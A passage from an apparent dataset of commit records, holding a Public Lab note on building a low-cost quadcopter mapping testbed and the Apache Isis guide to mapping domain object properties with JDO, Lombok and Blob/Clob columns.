Mapping\n\n\n\ngrassrootsmapping\n\n=== What I want to do\n\nI want to build a programmable aerial mapping vehicle that I can use as an interim testbed to refine various DIY\/Open Source methods that will eventually be included in a related project for an [affordable mapping drone](http:\/\/publiclab.org\/notes\/code4maine\/08-05-2014\/aerial-mapping-drone-for-under-60).\n\nimage::https:\/\/lh3.googleusercontent.com\/-VuFdGoKo3UE\/VcouDCctNRI\/AAAAAAAAWDU\/XHdkf7FCV7A\/s640-Ic42\/Quadannotated.png[]\n\n\nIn addition to testing flight components, the vehicle will also be a testbed for a wide variety of aerial sensors including a low-cost Camera's, LIDAR sensors and GPS.\n\n=== My attempt and results\n\n==== The -$100 Flying Wing\nThis project is an outgrowth of, and a complement to an earlier project that sought to build a fully programmable UAV for under $100. To keep costs down, project parameters stipulated that as much of the aircraft as possible should to be constructed out of standardized, off-the-shelf materials including the electronics which were designed around an Arduino Microcontroller and a Gyro-acceleromoter module extracted from a Ninetendo Wii remote. A flying-wing configuration using recycled foam allowed for further efficiency as it required only one motor and speed controller to remain in the air for longer periods. \n That project is still very much in progress and remains the ultimate goal. However, while I was amazed at how much could be achieved with nothing more than an Arduino pro Mini and a Wiimote, the project reached a critical juncture when it became clear that the 8bit Arduino would not be up to the task of following preprogrammed flight patterns by GPS waypoint. As this capability is central to the task of aerial mapping, the entire project has been forced to go \"back to the drawing board\"...\n\n==== Quadcopter\nAs counter-intuitive as it may seem, the simpler design in this case (the flying wing) turned out to be far more difficult than a more technologically complex design like a quadcopter. In the world of DIY\/Open Source, everything depends on there being enough documentation and support for any particular project. As the quadcopter configuration has become the most popular over the last decade, it is far easier to start from scratch as you can depend on there being ample support from other users whenever a problem is encountered.\n\n(In Progress) ","old_contents":"= Low Cost Quadcopter Build for DIY Mapping\n\n\n\ngrassrootsmapping\n\n===What I want to do\n\nI want to build a programmable aerial mapping vehicle that I can use as an interim testbed to refine various DIY\/Open Source methods that will eventually be included in a related project for an [affordable mapping drone](http:\/\/publiclab.org\/notes\/code4maine\/08-05-2014\/aerial-mapping-drone-for-under-60).\n\nimage::https:\/\/lh3.googleusercontent.com\/-VuFdGoKo3UE\/VcouDCctNRI\/AAAAAAAAWDU\/XHdkf7FCV7A\/s640-Ic42\/Quadannotated.png[]\n\n\nIn addition to testing flight components, the vehicle will also be a testbed for a wide variety of aerial sensors including a low-cost Camera's, LIDAR sensors and GPS.\n\n===My attempt and results\n\n====The -$100 Flying Wing\n This project is an outgrowth of, and a complement to an earlier project that sought to build a fully programmable UAV for under $100. To keep costs down, project parameters stipulated that as much of the aircraft as possible should to be constructed out of standardized, off-the-shelf materials including the electronics which were designed around an Arduino Microcontroller and a Gyro-acceleromoter module extracted from a Ninetendo Wii remote. A flying-wing configuration using recycled foam allowed for further efficiency as it required only one motor and speed controller to remain in the air for longer periods. \n That project is still very much in progress and remains the ultimate goal. However, while I was amazed at how much could be achieved with nothing more than an Arduino pro Mini and a Wiimote, the project reached a critical juncture when it became clear that the 8bit Arduino would not be up to the task of following preprogrammed flight patterns by GPS waypoint. As this capability is central to the task of aerial mapping, the entire project has been forced to go \"back to the drawing board\"...\n\nQuadcopter\n As counter-intuitive as it may seem, the simpler design in this case (the flying wing) turned out to be far more difficult than a more technologically complex design like a quadcopter. In the world of DIY\/Open Source, everything depends on there being enough documentation and support for any particular project. As the quadcopter configuration has become the most popular over the last decade, it is far easier to start from scratch as you can depend on there being ample support from other users whenever a problem is encountered.\n\n####ALL-IN-ONE\n ","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"caf4f74c7281fda1918990af8d7d4c2a8a854172","subject":"Update _ugfun_how-tos_class-structure_properties.adoc","message":"Update _ugfun_how-tos_class-structure_properties.adoc","repos":"estatio\/isis,oscarbou\/isis,apache\/isis,incodehq\/isis,apache\/isis,estatio\/isis,apache\/isis,oscarbou\/isis,apache\/isis,estatio\/isis,apache\/isis,incodehq\/isis,apache\/isis,oscarbou\/isis,incodehq\/isis,estatio\/isis,oscarbou\/isis,incodehq\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_ugfun_how-tos_class-structure_properties.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_ugfun_how-tos_class-structure_properties.adoc","new_contents":"[[_ugfun_how-tos_class-structure_properties]]\n= Property\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:_basedir: ..\/\n:_imagesdir: images\/\n\n\nA property is an instance variable of a domain object, of a scalar type, that holds some state about either a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_entities[domain entity] or a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_view-models[view model].\n\nFor example, a ``Customer``'s `firstName` would be a property, as would their `accountCreationDate` that they created their account.\nAll properties have at least a \"getter\" method, and most properties have also a \"setter\" method (meaning that they are mutable).\nProperties that do _not_ have a setter method are derived properties, and so are not persisted.\n\nFormally speaking, a property is simply a regular JavaBean getter, returning a scalar value recognized by the framework.\nMost properties (those that are editable\/modifiable) will also have a setter and (if persisted) a backing instance field.\nAnd most properties will also have a number of annotations:\n\n* Apache Isis defines its own set own `@Property` annotation for capturing domain semantics.\nIt also provides a `@PropertyLayout` for UI hints (though the information in this annotation may instead be provided by a supplementary xref:ugfun.adoc#_ugfun_object-layout[`.layout.xml`] file\n\n* the properties of domain entities are often annotated with the JDO\/DataNucleus `@javax.jdo.annotations.Column` annotation.\nFor property references, there may be other annotations to indicate whether the reference is bidirectional.\nIt's also possible (using annotations) to define a link table to hold foreign key columns.\n\n* for the properties of view models, then JAXB annotations such as `@javax.xml.bind.annotation.XmlElement` will be present\n\nApache Isis recognises some of these annotations for JDO\/DataNucleus and JAXB and infers some domain semantics from them (for example, the maximum allowable length of a string property).\n\nSince writing getter and setter methods adds quite a bit of boilerplate, it's common to use link:https:\/\/projectlombok.org\/[Project Lombok] to code generate these methods at compile time (using Java's annotation processor) simply by adding the `@lombok.Getter` and `@lombok.Setter` annotations to the field.\nThe xref:guides\/ugfun.adoc#_ugfun_getting-started_simpleapp-archetype[SimpleApp archetype] uses this approach.\n\n\n[[__ugfun_how-tos_class-structure_properties_value-vs-reference-types]]\n== Value vs Reference Types\n\nProperties can be either a value types (strings, int, date and so on) or be a reference to another object (for example, an `Order` referencing the `Customer` that placed it).\n\nFor example, to map a string value type:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter \/\/ <1>\nprivate String notes;\n----\n<1> using link:https:\/\/projectlombok.org\/[Project Lombok] annotations to reduce boilerplate\n\nYou could also add the `@Property` annotation if you wished:\n\n[source,java]\n----\n@Property\n@lombok.Getter @lombok.Setter\nprivate String notes;\n----\n\nAlthough in this case it is not required in this case (none of its attributes have been set).\n\nOr to map a reference type:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter\nprivate Customer customer;\n----\n\nIt's ok for a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_entities[domain entity] to reference another domain entity, and for a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_view-models[view model] to reference both view model and domain entities.\nHowever, it isn't valid for a domain entity to hold a persisted reference to view model (DataNucleus will not know how to persist that view model).\n\n[NOTE]\n====\nFor further details on mapping associations, see the JDO\/DataNucleus documentation for link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/one_to_many.html[one-to-many] associations, link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/many_to_one.html[many-to-one] associations, link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/many_to_many.html[many-to-many] associations, and so on.\n====\n\nFor domain entities, the annotations for mapping value types tend to be different for properties vs action parameters, because JDO annotations are only valid on properties.\nThe table in the xref:ugfun.adoc#_ugfun_how-tos_class-structure_properties-vs-parameters[Properties vs Parameters] section provides a handy reference of each.\n\n\n[[__ugfun_how-tos_class-structure_properties_optional-properties]]\n== Optional Properties\n\n(For domain entities) JDO\/DataNucleus' default is that a property is assumed to be mandatory if it is a primitive type (eg `int`, `boolean`), but optional if a reference type (eg `String`, `BigDecimal` etc).\nTo override optionality in JDO\/DataNucleus the `@Column(allowsNull=\"...\")` annotations is used.\n\nApache Isis on the other hand assumes that all properties (and action parameters, for that matter) are mandatory, not optional.\nThese defaults can also be overridden using Apache Isis' own annotations, specifically `@Property(optionality=...)`, or (because it's much less verbose) using `@javax.annotation.Nullable`.\n\nThese different defaults can lead to incompatibilities between the two frameworks.\nTo counteract that, Apache Isis also recognizes and honours JDO's `@Column(allowsNull=...)`.\n\nFor example, you can write:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@lombok.Getter @lombok.Setter\nprivate LocalDate date;\n----\n\nrather than the more verbose:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@Property(optionality=Optionality.OPTIONAL)\n@lombok.Getter @lombok.Setter\nprivate LocalDate date;\n----\n\nThe framework will search for any incompatibilities in optionality (whether specified explicitly or defaulted implicitly) between Isis' defaults and DataNucleus, and refuse to boot if any are found (fail fast).\n\n[[__ugfun_how-tos_class-structure_properties_editable-properties]]\n== Editable Properties\n\nApache Isis provides the capability to allow individual properties to be modified.\nThis is specified using the `@Property(editing=...)` attribute.\n\nFor example:\n\n[source,java]\n----\n@Property(editing = Editing.ENABLED)\n@lombok.Getter @lombok.Setter\nprivate String notes;\n----\n\nIf this is omitted then whether editing is enabled or disabled is defined globally, in the `isis.properties` configuration file; see xref:rgcfg.adoc#__rgcfg_configuring-core_isis-objects-editing[reference configuration guide] for further details.\n\n\n[[__ugfun_how-tos_class-structure_properties_ignoring-properties]]\n== Ignoring Properties\n\nBy default Apache Isis will automatically render all properties in the xref:ugvw.adoc[UI] or in the xref:ugvro.adoc[REST API].\nTo get Apache Isis to ignore a property (exclude it from its metamodel), annotate the getter using `@Programmatic`.\n\nSimilarly, you can tell JDO\/DataNucleus to ignore a property using the `@javax.jdo.annotations.NotPersistent` annotation.\nThis is independent of Apache Isis; in other words that property will still be rendered in the UI (unless also annotated with `@Programmatic`).\n\nFor view models, you can tell JAXB to ignore a property using the `@javax.xml.bind.annotation.XmlTransient` annotation.\nAgain, this is independent of Apache Isis.\n\n\n[[__ugfun_how-tos_class-structure_properties_derived-properties]]\n== Derived Properties\n\nDerived properties are those with a getter but no setter.\nProvided that the property has not been annotated with `@Programmatic`, these will still be rendered in the UI, but they will be read-only (not editable) and their state will not be persisted.\n\nSubtly different, it is also possible to have non-persisted but still editable properties.\nIn this case you will need a getter and a setter, but with the getter annotated using `@NotPersistent`.\nThe implementation of these getters and setters will most likely persist state using other properties (which might be hidden from view using `@Programmatic`).\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.NotPersistent\n@Property(editing=Editing.ENABLED)\npublic String getAddress() { return addressService.toAddress( getLatLong() ); } \/\/ <1>\npublic void setAddress(String address) { setLatLong(addressService.toLatLong(address)); }\n\n@javax.jdo.annotations.Column\nprivate String latLong;\n@Programmatic\npublic String getLatLong() { return latLong; } \/\/ <2>\npublic void setLatLong(String latLong) { this.latLong = latLong; }\n\n@javax.inject.Inject\nAddressService addressService; \/\/ <3>\n----\n<1> the representation of the address, in human readable form, eg \"10 Downing Street, London, UK\"\n<2> the lat\/long representation of the address, eg \"51.503363;-0.127625\"\n<3> an injected service that can convert to\/from address and latLong.\n\n[[__ugfun_how-tos_class-structure_properties_mapping-strings]]\n== Mapping ``String``s (Length)\n\nBy default JDO\/DataNucleus will map string properties to a `VARCHAR(255)`.\nTo limit the length, use the `@Column(length=...)` annotation.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(length=50)\n@lombok.Getter @lombok.Setter\nprivate String firstName\n----\n\nThis is a good example of a case where Apache Isis infers domain semantics from the JDO annotation.\n\n\n\n[[__ugfun_how-tos_class-structure_properties_mapping-joda-dates]]\n== Mapping JODA Date\n\nIsis' JDO objectstore bundles DataNucleus' http:\/\/www.datanucleus.org\/documentation\/products\/plugins.html[built-in support] for Joda `LocalDate` and `LocalDateTime` datatypes, meaning that entity properties of these types will be persisted as appropriate data types in the database tables.\n\nIt is, however, necessary to annotate your properties with `@javax.jdo.annotations.Persistent`, otherwise the data won't actually be persisted.\nSee the link:http:\/\/db.apache.org\/jdo\/field_types.html[JDO docs] for more details on this.\n\nMoreover, these datatypes are _not_ in the default fetch group, meaning that JDO\/DataNucleus will perform an additional `SELECT` query for each attribute.\nTo avoid this extra query, the annotation should indicate that the property is in the default fetch group.\n\nFor example, the `ToDoItem` (in the https:\/\/github.com\/isisaddons\/isis-app-todoapp[todoapp example app] (not ASF)) defines the `dueBy` property as follows:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"true\")\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@Getter @Setter\nprivate LocalDate dueBy;\n----\n\n[[__ugfun_how-tos_class-structure_properties_mapping-bigdecimals]]\n== Mapping ``BigDecimal``s (Precision)\n\nWorking with `java.math.BigDecimal` properties takes a little care due to scale\/precision issues.\n\nFor example, suppose we have:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter\nprivate BigDecimal impact;\n----\n\nJDO\/DataNucleus creates, at least with HSQL, the table with the field type as NUMERIC(19). No decimal digits are admitted. (Further details http:\/\/hsqldb.org\/doc\/2.0\/guide\/sqlgeneral-chapt.html#sgc_numeric_types[here]).\n\nWhat this implies is that, when a record is inserted, a log entry similar to this one appears:\n\n[source,java]\n----\nINSERT INTO ENTITY(..., IMPACT, ....) VALUES (...., 0.5, ....)\n----\n\nBut when that same record is retrieved, the log will show that a value of \"0\" is returned, instead of 0.5.\n\nThe solution is to explicitly add the scale to the field like this:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(scale=2)\n@lombok.Getter @lombok.Setter\nprivate BigDecimal impact;\n----\n\nIn addition, you should also set the scale of the `BigDecimal`, using `setScale(scale, roundingMode)`.\n\nMore information can be found http:\/\/www.opentaps.org\/docs\/index.php\/How_to_Use_Java_BigDecimal:_A_Tutorial[here] and http:\/\/www.tutorialspoint.com\/java\/math\/bigdecimal_setscale_rm_roundingmode.htm[here].\n\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs]]\n== Mapping ``Blob``s and ``Clob``s\n\nApache Isis configures JDO\/DataNucleus so that the properties of type `org.apache.isis.applib.value.Blob` and `org.apache.isis.applib.value.Clob` can also be persisted.\n\nAs for xref:ugfun.adoc#__ugfun_how-tos_class-structure_properties_mapping-joda-dates[Joda dates], this requires the `@javax.jdo.annotations.Persistent` annotation.\nHowever, whereas for dates one would always expect this value to be retrieved eagerly, for blobs and clobs it is not so clear cut.\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-blobs]]\n=== Mapping ``Blob``s\n\nFor example, in the `ToDoItem` class (of the https:\/\/github.com\/isisaddons\/isis-app-todoapp\/blob\/0333852ddd18ad67e3356fccf805aa442246790d\/dom\/src\/main\/java\/todoapp\/dom\/todoitem\/ToDoItem.java#L442[todoapp example app] (non-ASF) the `attachment` property is as follows:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\"),\n @javax.jdo.annotations.Column(name = \"attachment_bytes\", jdbcType=\"BLOB\", sqlType = \"LONGVARBINARY\")\n})\n@Property(\n optionality = Optionality.OPTIONAL\n)\n@lombok.Getter @lombok.Setter\nprivate Blob attachment;\n----\n\nThe three `@javax.jdo.annotations.Column` annotations are required because the mapping classes that Apache Isis provides (https:\/\/github.com\/apache\/isis\/blob\/isis-1.4.0\/component\/objectstore\/jdo\/jdo-datanucleus\/src\/main\/java\/org\/apache\/isis\/objectstore\/jdo\/datanucleus\/valuetypes\/IsisBlobMapping.java#L59[IsisBlobMapping] and https:\/\/github.com\/apache\/isis\/blob\/isis-1.4.0\/component\/objectstore\/jdo\/jdo-datanucleus\/src\/main\/java\/org\/apache\/isis\/objectstore\/jdo\/datanucleus\/valuetypes\/IsisClobMapping.java#L59[IsisClobMapping]) map to 3 columns.\n(It is not an error to omit these `@Column` annotations, but without them the names of the table columns are simply suffixed `_0`, `_1`, `_2` etc.\n\nIf the `Blob` is mandatory, then use:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\", allowsNull=\"false\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\", allowsNull=\"false\"),\n @javax.jdo.annotations.Column(name = \"attachment_bytes\",\n jdbcType=\"BLOB\", sqlType = \"LONGVARBINARY\",\n allowsNull=\"false\")\n})\n@Property(\n optionality = Optionality.MANDATORY\n)\n@lombok.Getter @lombok.Setter\nprivate Blob attachment;\n----\n\n[NOTE]\n====\nIf specifying a `sqlType` of \"LONGVARBINARY\" does not work, try instead \"BLOB\".\nThere can be differences in behaviour between JDBC drivers.\n====\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-clobs]]\n=== Mapping ``Clob``s\n\nMapping `Clob`s works in a very similar way, but the `jdbcType` and `sqlType` attributes will, respectively, be `CLOB` and `LONGVARCHAR`:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\"),\n @javax.jdo.annotations.Column(name = \"attachment_chars\",\n jdbcType=\"CLOB\", sqlType = \"LONGVARCHAR\")\n})\nprivate Clob doc;\n@Property(\n optionality = Optionality.OPTIONAL\n)\npublic Clob getDoc() {\n return doc;\n}\npublic void setDoc(final Clob doc) {\n this.doc = doc;\n}\n----\n\n[NOTE]\n====\nIf specifying a `sqlType` of \"LONGVARCHAR\" does not work, try instead \"CLOB\". There can be differences in behaviour between JDBC drivers.\n====\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-to-varbinary-or-varchar]]\n=== Mapping to VARBINARY or VARCHAR\n\nInstead of mapping to a sqlType of `LONGVARBINARY` (or perhaps `BLOB`), you might instead decide to map to a `VARBINARY`.\nThe difference is whether the binary data is held \"on-row\" or as a pointer \"off-row\"; with a `VARBINARY` the data is held on-row and so you will need to specify a length.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(name = \"attachment_bytes\", jdbcTypr=\"BLOB\", sqlType = \"VARBINARY\", length=2048)\n----\n\nThe same argument applies to `LONGVARCHAR` (or `CLOB`); you could instead map to a regular `VARCHAR`:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(name = \"attachment_chars\", sqlType = \"VARCHAR\", length=2048)\n----\nSupport and maximum allowed length will vary by database vendor.\n\n\n\n[[__ugfun_how-tos_class-structure_properties_handling-mandatory-properties-in-subtypes]]\n== Handling Mandatory Properties in Subtypes\n\nIf you have a hierarchy of classes then you need to decide which inheritance strategy to use.\n\n* \"table per hierarchy\", or \"rollup\" (`InheritanceStrategy.SUPERCLASS_TABLE`) +\n+\nwhereby a single table corresponds to the superclass, and also holds the properties of the subtype (or subtypes) being rolled up\n\n* \"table per class\" (`InheritanceStrategy.NEW_TABLE`) +\n+\nwhereby is a table for both superclass and subclass, in 1:1 correspondence\n\n* \"rolldown\" (`InheritanceStrategy.SUBCLASS_TABLE`) +\n+\nwhereby a single table holds the properties of the subtype, and also holds the properties of its supertype\n\nIn the first \"rollup\" case, we can have a situation where - logically speaking - the property is mandatory in the subtype - but it must be mapped as nullable in the database because it is n\/a for any other subtypes that are rolled up.\n\nIn this situation we must tell JDO that the column is optional, but to Apache Isis we want to enforce it being mandatory. This can be done using the `@Property(optionality=Optionality.MANDATORY)` annotation.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Inheritance(strategy = InheritanceStrategy.SUPER_TABLE)\npublic class SomeSubtype extends SomeSuperType {\n @javax.jdo.annotations.Column(allowsNull=\"true\")\n @Property(optionality=Optionality.MANDATORY)\n @lombok.Getter @lombok.Setter\n private LocalDate date;\n}\n----\n\n[TIP]\n====\nThe `@Property(optionality=...)` annotation is equivalent to the older but still supported `@Optional` annotation and `@Mandatory` annotations.\n====\n\n","old_contents":"[[_ugfun_how-tos_class-structure_properties]]\n= Property\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:_basedir: ..\/\n:_imagesdir: images\/\n\n\nA property is an instance variable of a domain object, of a scalar type, that holds some state about either a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_entities[domain entity] or a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_view-models[view model].\n\nFor example, a ``Customer``'s `firstName` would be a property, as would their `accountCreationDate` that they created their account.\nAll properties have at least a \"getter\" method, and most properties have also a \"setter\" method (meaning that they are immutable).\nProperties that do _not_ have a setter method are derived properties, and so are not persisted.\n\nFormally speaking, a property is simply a regular JavaBean getter, returning a scalar value recognized by the framework.\nMost properties (those that are editable\/modifiable) will also have a setter and (if persisted) a backing instance field.\nAnd most properties will also have a number of annotations:\n\n* Apache Isis defines its own set own `@Property` annotation for capturing domain semantics.\nIt also provides a `@PropertyLayout` for UI hints (though the information in this annotation may instead be provided by a supplementary xref:ugfun.adoc#_ugfun_object-layout[`.layout.xml`] file\n\n* the properties of domain entities are often annotated with the JDO\/DataNucleus `@javax.jdo.annotations.Column` annotation.\nFor property references, there may be other annotations to indicate whether the reference is bidirectional.\nIt's also possible (using annotations) to define a link table to hold foreign key columns.\n\n* for the properties of view models, then JAXB annotations such as `@javax.xml.bind.annotation.XmlElement` will be present\n\nApache Isis recognises some of these annotations for JDO\/DataNucleus and JAXB and infers some domain semantics from them (for example, the maximum allowable length of a string property).\n\nSince writing getter and setter methods adds quite a bit of boilerplate, it's common to use link:https:\/\/projectlombok.org\/[Project Lombok] to code generate these methods at compile time (using Java's annotation processor) simply by adding the `@lombok.Getter` and `@lombok.Setter` annotations to the field.\nThe xref:guides\/ugfun.adoc#_ugfun_getting-started_simpleapp-archetype[SimpleApp archetype] uses this approach.\n\n\n[[__ugfun_how-tos_class-structure_properties_value-vs-reference-types]]\n== Value vs Reference Types\n\nProperties can be either a value types (strings, int, date and so on) or be a reference to another object (for example, an `Order` referencing the `Customer` that placed it).\n\nFor example, to map a string value type:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter \/\/ <1>\nprivate String notes;\n----\n<1> using link:https:\/\/projectlombok.org\/[Project Lombok] annotations to reduce boilerplate\n\nYou could also add the `@Property` annotation if you wished:\n\n[source,java]\n----\n@Property\n@lombok.Getter @lombok.Setter\nprivate String notes;\n----\n\nAlthough in this case it is not required in this case (none of its attributes have been set).\n\nOr to map a reference type:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter\nprivate Customer customer;\n----\n\nIt's ok for a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_entities[domain entity] to reference another domain entity, and for a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_view-models[view model] to reference both view model and domain entities.\nHowever, it isn't valid for a domain entity to hold a persisted reference to view model (DataNucleus will not know how to persist that view model).\n\n[NOTE]\n====\nFor further details on mapping associations, see the JDO\/DataNucleus documentation for link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/one_to_many.html[one-to-many] associations, link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/many_to_one.html[many-to-one] associations, link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/many_to_many.html[many-to-many] associations, and so on.\n====\n\nFor domain entities, the annotations for mapping value types tend to be different for properties vs action parameters, because JDO annotations are only valid on properties.\nThe table in the xref:ugfun.adoc#_ugfun_how-tos_class-structure_properties-vs-parameters[Properties vs Parameters] section provides a handy reference of each.\n\n\n[[__ugfun_how-tos_class-structure_properties_optional-properties]]\n== Optional Properties\n\n(For domain entities) JDO\/DataNucleus' default is that a property is assumed to be mandatory if it is a primitive type (eg `int`, `boolean`), but optional if a reference type (eg `String`, `BigDecimal` etc).\nTo override optionality in JDO\/DataNucleus the `@Column(allowsNull=\"...\")` annotations is used.\n\nApache Isis on the other hand assumes that all properties (and action parameters, for that matter) are mandatory, not optional.\nThese defaults can also be overridden using Apache Isis' own annotations, specifically `@Property(optionality=...)`, or (because it's much less verbose) using `@javax.annotation.Nullable`.\n\nThese different defaults can lead to incompatibilities between the two frameworks.\nTo counteract that, Apache Isis also recognizes and honours JDO's `@Column(allowsNull=...)`.\n\nFor example, you can write:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@lombok.Getter @lombok.Setter\nprivate LocalDate date;\n----\n\nrather than the more verbose:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@Property(optionality=Optionality.OPTIONAL)\n@lombok.Getter @lombok.Setter\nprivate LocalDate date;\n----\n\nThe framework will search for any incompatibilities in optionality (whether specified explicitly or defaulted implicitly) between Isis' defaults and DataNucleus, and refuse to boot if any are found (fail fast).\n\n[[__ugfun_how-tos_class-structure_properties_editable-properties]]\n== Editable Properties\n\nApache Isis provides the capability to allow individual properties to be modified.\nThis is specified using the `@Property(editing=...)` attribute.\n\nFor example:\n\n[source,java]\n----\n@Property(editing = Editing.ENABLED)\n@lombok.Getter @lombok.Setter\nprivate String notes;\n----\n\nIf this is omitted then whether editing is enabled or disabled is defined globally, in the `isis.properties` configuration file; see xref:rgcfg.adoc#__rgcfg_configuring-core_isis-objects-editing[reference configuration guide] for further details.\n\n\n[[__ugfun_how-tos_class-structure_properties_ignoring-properties]]\n== Ignoring Properties\n\nBy default Apache Isis will automatically render all properties in the xref:ugvw.adoc[UI] or in the xref:ugvro.adoc[REST API].\nTo get Apache Isis to ignore a property (exclude it from its metamodel), annotate the getter using `@Programmatic`.\n\nSimilarly, you can tell JDO\/DataNucleus to ignore a property using the `@javax.jdo.annotations.NotPersistent` annotation.\nThis is independent of Apache Isis; in other words that property will still be rendered in the UI (unless also annotated with `@Programmatic`).\n\nFor view models, you can tell JAXB to ignore a property using the `@javax.xml.bind.annotation.XmlTransient` annotation.\nAgain, this is independent of Apache Isis.\n\n\n[[__ugfun_how-tos_class-structure_properties_derived-properties]]\n== Derived Properties\n\nDerived properties are those with a getter but no setter.\nProvided that the property has not been annotated with `@Programmatic`, these will still be rendered in the UI, but they will be read-only (not editable) and their state will not be persisted.\n\nSubtly different, it is also possible to have non-persisted but still editable properties.\nIn this case you will need a getter and a setter, but with the getter annotated using `@NotPersistent`.\nThe implementation of these getters and setters will most likely persist state using other properties (which might be hidden from view using `@Programmatic`).\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.NotPersistent\n@Property(editing=Editing.ENABLED)\npublic String getAddress() { return addressService.toAddress( getLatLong() ); } \/\/ <1>\npublic void setAddress(String address) { setLatLong(addressService.toLatLong(address)); }\n\n@javax.jdo.annotations.Column\nprivate String latLong;\n@Programmatic\npublic String getLatLong() { return latLong; } \/\/ <2>\npublic void setLatLong(String latLong) { this.latLong = latLong; }\n\n@javax.inject.Inject\nAddressService addressService; \/\/ <3>\n----\n<1> the representation of the address, in human readable form, eg \"10 Downing Street, London, UK\"\n<2> the lat\/long representation of the address, eg \"51.503363;-0.127625\"\n<3> an injected service that can convert to\/from address and latLong.\n\n[[__ugfun_how-tos_class-structure_properties_mapping-strings]]\n== Mapping ``String``s (Length)\n\nBy default JDO\/DataNucleus will map string properties to a `VARCHAR(255)`.\nTo limit the length, use the `@Column(length=...)` annotation.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(length=50)\n@lombok.Getter @lombok.Setter\nprivate String firstName\n----\n\nThis is a good example of a case where Apache Isis infers domain semantics from the JDO annotation.\n\n\n\n[[__ugfun_how-tos_class-structure_properties_mapping-joda-dates]]\n== Mapping JODA Date\n\nIsis' JDO objectstore bundles DataNucleus' http:\/\/www.datanucleus.org\/documentation\/products\/plugins.html[built-in support] for Joda `LocalDate` and `LocalDateTime` datatypes, meaning that entity properties of these types will be persisted as appropriate data types in the database tables.\n\nIt is, however, necessary to annotate your properties with `@javax.jdo.annotations.Persistent`, otherwise the data won't actually be persisted.\nSee the link:http:\/\/db.apache.org\/jdo\/field_types.html[JDO docs] for more details on this.\n\nMoreover, these datatypes are _not_ in the default fetch group, meaning that JDO\/DataNucleus will perform an additional `SELECT` query for each attribute.\nTo avoid this extra query, the annotation should indicate that the property is in the default fetch group.\n\nFor example, the `ToDoItem` (in the https:\/\/github.com\/isisaddons\/isis-app-todoapp[todoapp example app] (not ASF)) defines the `dueBy` property as follows:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"true\")\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@Getter 